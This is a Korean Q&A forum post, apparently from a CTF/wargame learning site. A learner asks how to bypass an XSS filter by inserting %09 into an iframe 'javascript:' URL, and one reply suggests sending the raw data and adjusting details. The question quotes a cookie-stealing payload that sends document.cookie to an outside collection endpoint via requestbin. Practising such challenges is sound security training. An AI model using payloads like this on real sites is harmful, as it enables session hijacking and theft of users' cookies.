우회방법과 cookie 질문드립니다...

iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요,

iframe src="javascri%09pt:locatio%09n.href=%27~~~.dreamhack.games/?memo=%27+docu%09ment.gookie;">
구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고

flag 페이지에선 아무것도 전송되지 않습니다...

<iframe srcdoc 로는 javascript:~~ 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ

#web
작성자 정보
답변 1
탈퇴한 이용자
대표 업적 없음

인코딩 되기 전 raw 데이터로 바꿔서 넣어보세요
그리고 디테일한 부분만 조정하시면 충분히 플래그를 얻을 수 있어요

2022.06.30. 13:17
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기